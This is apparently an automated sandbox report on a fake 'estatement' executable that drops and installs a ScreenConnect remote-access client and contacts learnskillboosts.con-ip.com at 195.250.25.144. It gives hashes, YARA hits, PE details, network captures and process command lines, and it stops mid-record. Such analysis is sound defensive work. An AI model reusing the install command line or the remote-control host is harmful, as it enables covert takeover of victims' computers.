                                                                    SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                    SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                    SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.8171940082154723
                                                                    Encrypted:false
                                                                    SSDEEP:96:dhM1zFTRam5po6fLiJxd+NRBkYlEq2+66KD:81plz5po6+JoBkIz6x
                                                                    MD5:1E014507AEFF453CB65AB2B795B65E0F
                                                                    SHA1:66A6DDF268B0A19D14A3FCF68789D47A559070AC
                                                                    SHA-256:F6115761810043A3BF215C4E4A7A93D240C6C1159F7ADA99CC77D6F60F73CF3F
                                                                    SHA-512:356D72081653BD117D26643CD893C3CA40EEBB508F4A6056C853DABD7D7469CF88D8AE642FA8C0A0CBF879AAB19DAB4968F067E66D7806C8ED8F4FA0D245F82A
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF23619B86A3BB53E3.TMP, Author: Joe Security
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4322564050025077
                                                                    Encrypted:false
                                                                    SSDEEP:96:UUkTRTosam5po6fLiJxd+NRBkYlEq2+66KD:WTRUsz5po6+JoBkIz6x
                                                                    MD5:9C3BB37F2EEDC55653A3644E5CCADA8E
                                                                    SHA1:B7BA367A6B4542C2C3A904EE9DBE98117D259270
                                                                    SHA-256:004D2E9AD27240534FD4A43145FD915F4731CFDB2E5F9D48388B21C5B58EA3E1
                                                                    SHA-512:6492E8DAA60BB20F5026C7D3FC59646A817BAE4E6AD703345660556C0EA1D0FFD21E0A02BEBC2177E7CBD1BB79AEF7727E08EDE5E48ECBAD65A60AB76C086146
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF2BE9192CA85E951C.TMP, Author: Joe Security
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4322564050025077
                                                                    Encrypted:false
                                                                    SSDEEP:96:UUkTRTosam5po6fLiJxd+NRBkYlEq2+66KD:WTRUsz5po6+JoBkIz6x
                                                                    MD5:9C3BB37F2EEDC55653A3644E5CCADA8E
                                                                    SHA1:B7BA367A6B4542C2C3A904EE9DBE98117D259270
                                                                    SHA-256:004D2E9AD27240534FD4A43145FD915F4731CFDB2E5F9D48388B21C5B58EA3E1
                                                                    SHA-512:6492E8DAA60BB20F5026C7D3FC59646A817BAE4E6AD703345660556C0EA1D0FFD21E0A02BEBC2177E7CBD1BB79AEF7727E08EDE5E48ECBAD65A60AB76C086146
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF4FF09AA005F92BAC.TMP, Author: Joe Security
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):0.2411341263657055
                                                                    Encrypted:false
                                                                    SSDEEP:48:56bUcuDBAdu0U6S3qcq56Adu0U6SiLiJuWd+AfjKRBf8Yl/T4wM02Nhrwm/5Uy:5BcI6xpo6fLiJxd+NRBkYlEq2gmO
                                                                    MD5:929DBA933324722F4BB94C50891ECF4C
                                                                    SHA1:FF584024B0FEBF9B5186EFABBA03C574F24E58E7
                                                                    SHA-256:A89B612C3E688BFE004550974550A51D6088FCE98283E352C21DC62CE33FA8BF
                                                                    SHA-512:85358FD338BAEE6AB8177D18915102D03C9AA03AEAB95E26EE6317B586B69B0F1299A36F8730C430D8F6D1B086547600170AACD5A76C6803D9C718DE8C3ADADD
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF7AC8940F9BF3568C.TMP, Author: Joe Security
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4322564050025077
                                                                    Encrypted:false
                                                                    SSDEEP:96:UUkTRTosam5po6fLiJxd+NRBkYlEq2+66KD:WTRUsz5po6+JoBkIz6x
                                                                    MD5:9C3BB37F2EEDC55653A3644E5CCADA8E
                                                                    SHA1:B7BA367A6B4542C2C3A904EE9DBE98117D259270
                                                                    SHA-256:004D2E9AD27240534FD4A43145FD915F4731CFDB2E5F9D48388B21C5B58EA3E1
                                                                    SHA-512:6492E8DAA60BB20F5026C7D3FC59646A817BAE4E6AD703345660556C0EA1D0FFD21E0A02BEBC2177E7CBD1BB79AEF7727E08EDE5E48ECBAD65A60AB76C086146
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF7B9A0F9D3088424B.TMP, Author: Joe Security
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.8171940082154723
                                                                    Encrypted:false
                                                                    SSDEEP:96:dhM1zFTRam5po6fLiJxd+NRBkYlEq2+66KD:81plz5po6+JoBkIz6x
                                                                    MD5:1E014507AEFF453CB65AB2B795B65E0F
                                                                    SHA1:66A6DDF268B0A19D14A3FCF68789D47A559070AC
                                                                    SHA-256:F6115761810043A3BF215C4E4A7A93D240C6C1159F7ADA99CC77D6F60F73CF3F
                                                                    SHA-512:356D72081653BD117D26643CD893C3CA40EEBB508F4A6056C853DABD7D7469CF88D8AE642FA8C0A0CBF879AAB19DAB4968F067E66D7806C8ED8F4FA0D245F82A
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF901E3882A4632C12.TMP, Author: Joe Security
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.07741335036671994
                                                                    Encrypted:false
                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOSWS9RiVSKChiVky6l51:2F0i8n0itFzDHFtw7r
                                                                    MD5:3ECE67DFCBADAD2A7C3CF6E72847EC97
                                                                    SHA1:1D500C5D2B84A471C3FF7EE06C6D04E66381D0F6
                                                                    SHA-256:AFE50E33DFEBA11C8B5DE75C19DA2A7FEE4B49E42F5A7C96F4B015AE357CE79B
                                                                    SHA-512:DBDDAF3D7C878DB1EFA61B0BE94A9C7D336895569A016BA6B5F53AA525E3B81E2E7DF703B8E009C0FD694A1A022E36552F6C0BABC721965AFCB370D06B57602D
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.429449323610171
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:estatement020134230003.exe.virus.exe
                                                                    File size:5'620'176 bytes
                                                                    MD5:3cc83797cf15bc705fa0b723f03fa5d4
                                                                    SHA1:38773bb12d9223506573fd5e8eaf9d545b30573c
                                                                    SHA256:c4e648e5d4284160fbe55ebafcb6f7bf1236f153d5ce0660cdb45568e1287f2f
                                                                    SHA512:47615f003641bc64621ce7fa0b10b01c5a1bc4b5970d1724c16df6e335d2b0e51b9397f0d9241b31a69dbd71aa7f91d1b5322afd87b6136852dbcce3ecc27857
                                                                    SSDEEP:49152:8EEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:VEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                    TLSH:C246E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x4014ad
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                    Signature Valid:true
                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                    Signature Validation Error:The operation completed successfully
                                                                    Error Number:0
                                                                    Not Before, Not After
                                                                    • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                    Subject Chain
                                                                    • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                    Version:3
                                                                    Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                    Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                    Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                    Serial:0B9360051BCCF66642998998D5BA97CE
                                                                    Instruction
                                                                    call 00007F1634DD026Ah
                                                                    jmp 00007F1634DCFD1Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push 00000000h
                                                                    call dword ptr [0040D040h]
                                                                    push dword ptr [ebp+08h]
                                                                    call dword ptr [0040D03Ch]
                                                                    push C0000409h
                                                                    call dword ptr [0040D044h]
                                                                    push eax
                                                                    call dword ptr [0040D048h]
                                                                    pop ebp
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000324h
                                                                    push 00000017h
                                                                    call dword ptr [0040D04Ch]
                                                                    test eax, eax
                                                                    je 00007F1634DCFEA7h
                                                                    push 00000002h
                                                                    pop ecx
                                                                    int 29h
                                                                    mov dword ptr [004148D8h], eax
                                                                    mov dword ptr [004148D4h], ecx
                                                                    mov dword ptr [004148D0h], edx
                                                                    mov dword ptr [004148CCh], ebx
                                                                    mov dword ptr [004148C8h], esi
                                                                    mov dword ptr [004148C4h], edi
                                                                    mov word ptr [004148F0h], ss
                                                                    mov word ptr [004148E4h], cs
                                                                    mov word ptr [004148C0h], ds
                                                                    mov word ptr [004148BCh], es
                                                                    mov word ptr [004148B8h], fs
                                                                    mov word ptr [004148B4h], gs
                                                                    pushfd
                                                                    pop dword ptr [004148E8h]
                                                                    mov eax, dword ptr [ebp+00h]
                                                                    mov dword ptr [004148DCh], eax
                                                                    mov eax, dword ptr [ebp+04h]
                                                                    mov dword ptr [004148E0h], eax
                                                                    lea eax, dword ptr [ebp+08h]
                                                                    mov dword ptr [004148ECh], eax
                                                                    mov eax, dword ptr [ebp-00000324h]
                                                                    mov dword ptr [00414828h], 00010001h
                                                                    Programming Language:
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 build 21022
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x15fd0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    FILES0x163d40x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3962220149253731
                                                                    FILES0x9c3d40x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111589431762695
                                                                    FILES0x2409d40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415066442757009
                                                                    FILES0x25b5d40x2ec318PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9810924530029297
                                                                    FILES0x5478ec0x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                    RT_MANIFEST0x548eec0x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                    DLLImport
                                                                    mscoree.dllCorBindToRuntimeEx
                                                                    KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                    OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 5, 2024 19:51:27.709834099 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:27.830060005 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:27.830131054 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:28.332489014 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:28.452299118 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:29.002015114 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:29.034836054 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:29.156404972 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:29.396837950 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:29.488670111 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:29.590367079 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:29.647888899 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:31.032984018 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:31.033039093 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:51:31.155179977 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:31.155208111 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:31.155277967 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:31.155406952 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:31.155688047 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:31.155698061 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:31.418143988 CET804149720195.250.25.144192.168.2.11
                                                                    Dec 5, 2024 19:51:31.481465101 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:52:31.429230928 CET497208041192.168.2.11195.250.25.144
                                                                    Dec 5, 2024 19:52:31.550013065 CET804149720195.250.25.144192.168.2.11
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 5, 2024 19:51:26.148056984 CET5240853192.168.2.111.1.1.1
                                                                    Dec 5, 2024 19:51:27.217370987 CET5240853192.168.2.111.1.1.1
                                                                    Dec 5, 2024 19:51:27.662760973 CET53524081.1.1.1192.168.2.11
                                                                    Dec 5, 2024 19:51:27.662877083 CET53524081.1.1.1192.168.2.11
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 19:51:26.148056984 CET192.168.2.111.1.1.10x3959Standard query (0)learnskillboosts.con-ip.comA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 19:51:27.217370987 CET192.168.2.111.1.1.10x3959Standard query (0)learnskillboosts.con-ip.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 19:51:27.662760973 CET1.1.1.1192.168.2.110x3959No error (0)learnskillboosts.con-ip.com195.250.25.144A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 19:51:27.662877083 CET1.1.1.1192.168.2.110x3959No error (0)learnskillboosts.con-ip.com195.250.25.144A (IP address)IN (0x0001)false

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:13:51:18
                                                                    Start date:05/12/2024
                                                                    Path:C:\Users\user\Desktop\estatement020134230003.exe.virus.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\estatement020134230003.exe.virus.exe"
                                                                    Imagebase:0xcd0000
                                                                    File size:5'620'176 bytes
                                                                    MD5 hash:3CC83797CF15BC705FA0B723F03FA5D4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1363853523.0000000005690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1392397401.00000000074E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:13:51:19
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"
                                                                    Imagebase:0x650000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:13:51:19
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                    Imagebase:0x7ff65f7f0000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:13:51:20
